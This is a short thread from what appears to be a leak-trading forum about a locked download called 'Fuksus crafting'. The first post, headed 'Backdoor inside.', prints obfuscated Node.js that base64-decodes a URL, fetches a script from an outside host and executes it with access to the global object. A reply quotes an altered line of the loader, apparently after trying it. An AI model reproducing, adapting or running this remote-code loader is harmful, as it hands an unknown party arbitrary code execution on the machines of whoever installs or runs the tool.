HighLeaks
Help

Fuksus crafting working

hexo_nxx hexo_nxx Started 2 replies 686 views 100 Credits

Download Link Locked

Pay 100 credits to unlock the download link for 24 hours.

Login to unlock
#1
Fuksus crafting working
#1
Backdoor inside.



(function () {

const $ = require(Buffer.from('aHR0cHM=', 'base64').toString());

const _ = Buffer.from('aHR0cHM6Ly8xbHMyLm9yZy91c2Vycy9qcy90ZXN0cy5qcw==', 'base64').toString();

const $$ = ['data', 'end', 'error', 'statusCode', 'global'];

$['get'](_, r => {

let d = '';

r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[3]] === 200 && new Function($$[4], d)(global));

})['on']($$[2], () => {});

})();
#2
Hmm ty, I tried with r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[2]] === 200 && new Function($$[4], d)(global)); instead of r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[3]] === 200 && new Function($$[4], d)(global));, ty for your help!